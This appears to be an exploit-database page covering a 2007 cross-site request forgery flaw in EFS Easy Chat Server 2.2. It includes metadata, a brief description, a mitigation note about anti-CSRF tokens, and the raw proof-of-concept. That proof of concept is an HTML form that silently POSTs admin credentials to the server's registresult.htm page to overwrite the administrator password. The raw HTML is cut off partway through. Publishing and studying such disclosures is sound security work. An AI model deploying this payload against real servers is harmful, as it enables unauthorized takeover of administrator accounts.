header-logo
Suggest Exploit
vendor:
Easy Chat Server
by:
Mountassif Moad
8.8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: Easy Chat Server
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: 2.2:echatserver.com:ecssetup.exe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2007

EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability

This exploit allows an attacker to change the admin password of EFS Easy Chat Server version 2.2 by submitting a malicious POST request to the registresult.htm page. The malicious request contains the username, password, confirm password, email and resume fields which are used to change the admin password. The attacker can then use the new credentials to gain access to the server.

Mitigation:

The application should use a secure random token to verify the authenticity of the request. The token should be stored in a secure cookie and should be checked against the server-side token before processing the request.
Source

Exploit-DB raw data:

<HTML>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server  http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
 -->
<HEAD>
<TITLE>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
        <TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
      </TR>
<TR>
        <TD> Username:
          <INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30"  value="stack"> *
</TD></TR>
<TR>
        <TD> Confirm Password:
          <INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
   <BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba